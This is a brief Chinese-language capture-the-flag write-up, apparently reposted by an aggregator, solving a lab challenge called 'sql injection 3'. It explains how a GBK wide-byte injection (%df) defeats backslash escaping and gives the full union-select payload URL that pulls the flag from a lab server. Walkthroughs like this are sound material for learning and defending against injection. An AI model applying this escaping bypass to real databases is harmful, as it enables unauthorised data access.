sql injection 3

Posted 成长中的利剑

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql injection 3相关的知识,希望对你有一定的参考价值。

打开就看见

执行的sql语句:SELECT id,title FROM news WHERE id=’1’

尝试闭合构造语句,发现无论怎么构造都会出现\

http://115.28.150.176/sqli/index.php?id=1’ select * from news

看来需要干掉/。尝试id ,发现id=2时出现提示

id: 2 title: gbk_sql_injection

看来是宽字节注入
可知当存在%df时就会吃掉\
多次尝试,最终构造

http://115.28.150.176/sqli/index.php?id=%df’ union select *,1 from flag%23

出现flag



以上是关于sql injection 3的主要内容,如果未能解决你的问题,请参考以下文章

ecshop 2.x 3.x sql injection/rce payload

这个代码在 PDO 中是​​ sql-injection-safe 吗?

dedecms /member/mtypes.php SQL Injection Vul

SQL Injection 代码审计 1 (转)FreeBuf.COM

dedecms /member/flink_main.php SQL Injection Vul

SQL Injection(SQL注入漏洞)